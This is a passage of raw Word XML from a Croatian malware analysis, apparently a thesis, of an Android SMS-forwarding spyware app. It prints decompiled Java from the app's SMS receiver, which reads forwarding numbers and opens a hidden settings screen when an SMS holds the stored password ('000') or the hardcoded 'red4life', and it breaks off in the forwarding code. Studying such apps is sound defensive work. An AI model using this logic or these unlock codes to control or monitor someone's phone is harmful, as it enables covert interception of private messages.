      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>onCreate</w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> se pokrene kada se stvori datoteka baze podataka u njoj se saznaje da se stvori tablica koja sadrži primarni ključ, broj telefona, tekst aktivacije te tražena varijabla </w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ui_pass</w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. Daljnjim prolaskom kroz kod dolazi se do metode </w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>execSQL</w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koja izvršava zadani izraz baze podataka, a u vrijednostima (VALUES) se nalazi da je inicijalna vrijednost varijable </w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ui_pass</w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> 000. Preostaje provjeriti ispravnost tvrdnji na način koji je već opisan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD4512" w:rsidRDefault="00B35A13" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="401955"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="Slika 32" descr="Slanje poruke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nje poruke 0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7545" cy="401955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711A86" w:rsidRDefault="00711A86" w:rsidP="00DF62C7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="00DF62C7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Slanje poruke „000”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711A86" w:rsidRDefault="00711A86" w:rsidP="00711A86">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00711A86" w:rsidRDefault="00B35A13" w:rsidP="00711A86">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2210435" cy="3728085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="33" name="Slika 33" descr="Ponovna pojava pr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novna pojava program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10435" cy="3728085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D17D61" w:rsidRDefault="00D17D61" w:rsidP="00B53820">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="00B53820">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Program se ponovno otvorio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711A86" w:rsidRPr="00711A86" w:rsidRDefault="00711A86" w:rsidP="00711A86">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003F0112" w:rsidRDefault="003F0112" w:rsidP="003F0112">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>Budući da se slanjem sms poruke sadržaja „000” opet otvorio prozor programa, dolazi se do zaključka da je i drugi zadatak uspješno okončan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711A86" w:rsidRDefault="00711A86" w:rsidP="003F0112">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRDefault="00B832B6" w:rsidP="00B832B6">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Aktivacijom programa, postane vidljiv i proces što se može vidjeti izdavanjem sljedećih naredbi:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRDefault="00B832B6" w:rsidP="00B832B6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>adb shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRDefault="00B832B6" w:rsidP="00B832B6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F0112" w:rsidRDefault="003F0112" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D17D61" w:rsidRDefault="00B35A13" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="3587115"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="Slika 34" descr="Vidljivi pro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dljivi proc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7545" cy="3587115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D17D61" w:rsidRDefault="00D17D61" w:rsidP="003D4299">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="003D4299">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Proces postaje vidljiv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D17D61" w:rsidRDefault="00D17D61" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRDefault="003F0112" w:rsidP="00C97C82">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>Analiz</w:t>
      </w:r>
      <w:r w:rsidR="00C97C82">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>om se došlo do pronalaska lozin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00C97C82">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> za otvaranje programa, a sljedeći zadatak je kako program radi kada je aktiviran. U slučaju primitka poruke sa sadržajem zapisanim u varijabli baze podataka </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ui_pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> ili sadržajem „red4life”</w:t>
      </w:r>
      <w:r w:rsidR="00302246">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, otvorit će se prozor s postavkama, no što će se dogoditi ako se pošalje poruka s drugim sadržajem.</w:t>
      </w:r>
      <w:r w:rsidR="00B832B6">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRPr="00B832B6" w:rsidRDefault="00B832B6" w:rsidP="00B832B6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="00302246" w:rsidRDefault="00302246" w:rsidP="00302246">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Budući da razred </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SMSReceiver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> obrađuje primljene poruke, opet se krene od njega, ali sada će se pozornost obratiti na drugi dio uvjeta: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                ShadyDB shadydb = new ShadyDB(context);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                SQLiteDatabase sqlitedatabase = shadydb.getReadableDatabase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                Cursor cursor1 = sqlitedatabase.query("settings", null, null, null, null, null, null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                cursor1.moveToFirst();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                DBforwardingNo = cursor1.getString(cursor1.getColumnIndex("phone_no"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                DB_ui_pass = cursor1.getString(cursor1.getColumnIndex("ui_pass"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>DBactivate = cursor1.getString(cursor1.getColumnIndex("activate"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                System.out.println((new StringBuilder("+++++++++++jjj+++++++++++++")).append(DBactivate).toString());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                cursor1.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                sqlitedatabase.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                shadydb.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                Log.d("Database:Forwarding Numbers", DB_ui_pass);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            catch(Exception exception)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                Log.d("Database:OnClickListener::", (new StringBuilder("Crap!!failed to Retrieve Information ")).append(exception.toString()).toString());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            if(msg.equalsIgnoreCase(DB_ui_pass) || msg.equalsIgnoreCase("red4life"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                Intent intent1 = new Intent(context, com/dlp/SMSReplicatorSecret/SMSReplicatorSecret);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                intent1.addFlags(0x10000000);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                context.startActivity(intent1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            } </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">            if(DBactivate.equalsIgnoreCase("Activate"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>label1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                    smsmanager = SmsManager.getDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                    stringtokenizer = new StringTokenizer(DBforwardingNo, ",");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                    stringbuffer = new StringBuffer(str);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
